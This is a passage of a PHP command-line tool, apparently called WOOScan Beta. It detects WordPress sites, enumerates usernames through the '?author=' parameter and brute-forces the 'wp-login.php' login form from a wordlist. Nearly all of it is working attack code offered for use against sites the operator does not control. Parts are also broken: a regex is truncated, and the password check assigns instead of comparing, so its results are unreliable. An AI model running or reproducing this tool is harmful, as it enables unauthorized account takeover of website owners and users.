Wordpress\n "); } else { v("\t[ ".date("H:i:s")." ] $url ==> Not WordPress\n "); } } function vurl($url){ if(preg_match("#http://#", $url)){ $url = $url; } elseif (preg_match("#https://#", $url)) { $url = $url; } else { $url = "http://".$url; } return $url; } function curls($url,$data = null){ $ch = curl_init($url); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"); if($data !=null) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $result = curl_exec($ch); return $result; curl_close($ch); } function v($x=""){ echo $x; } function uc($url){ v("\t[ ".date("H:i:s")." ] Check Username : ".$url."\n"); for($id=1;$id<=10;$id++){ $get = curls("$url?author=$id",null); preg_match("/ $login \n"); } else { v("\t[ ".date("H:i:s")." ] ID ( $id ) | Username Not Found!\n"); } } } function bf($url,$username,$password){ $get = curls($url."wp-login.php","&log=$username&pwd=$password"); preg_match("/The password you entered for the username/", $get , $login); if($login[0]=""){ v("\t[ ".date("H:i:s")." ] Cracking.... | Password => $password\n"); } else { v("\t[ ".date("H:i:s")." ] Cracking.... | Not Matches => $password\n"); } } function banner(){ v("\n\t====================================================\n\tWOOScan Beta\n\t====================================================\n\tWordpress Tools Scan V.0.1 \n\tTools Running In Device [ ".OS()." ]\n\tCode By ZakirDotID\n\tUsage : -help\n\t====================================================\n"); } function _rd(){ return fopen('php://stdin', 'r'); } function OS() { return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux"; } if (isset($argv[1])) { switch ($argv[1]) { case '-help': banner(); v("\n\tUsage : \n\t[ -wpbf ] Wordpress Brute Force Login\n\t[ -usercheck ] Wordpress Checker Username\n\t[ -scan ] Wordpress Site Checker\n"); break; case '-scan': banner(); v("\n\tScanning Site Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : "); $url = trim(fgets(_rd())); $url = vurl($url); check($url); break; case '-usercheck': banner(); v("\n\tScanning Username Wordpress Beta | Example : http://www.site.com/path/\n\tInput Url : "); $url = trim(fgets(_rd())); $url = vurl($url); uc($url); break; case '-wpbf': banner(); v("\n\tBrute Force Wordpress Beta | Example : http://www.site.com/path/ \n\tInput Url : "); $url = trim(fgets(_rd())); $url = vurl($url); v("\tInput Username : "); $username = trim(fgets(_rd())); v("\tInput Wordist : "); $list = trim(fgets(_rd())); $paswd = file_get_contents($list) or exit("\n\tFile Not found!\n"); $paswds = explode("\r\n", $paswd); v("\tPlease Wait....\n"); sleep(1); foreach ($paswds as $password) { bf($url,$username,$password); } break; default: banner(); break; } } else { banner(); v("\tError Command Not found!\n"); } //echo vurl("https://localhost");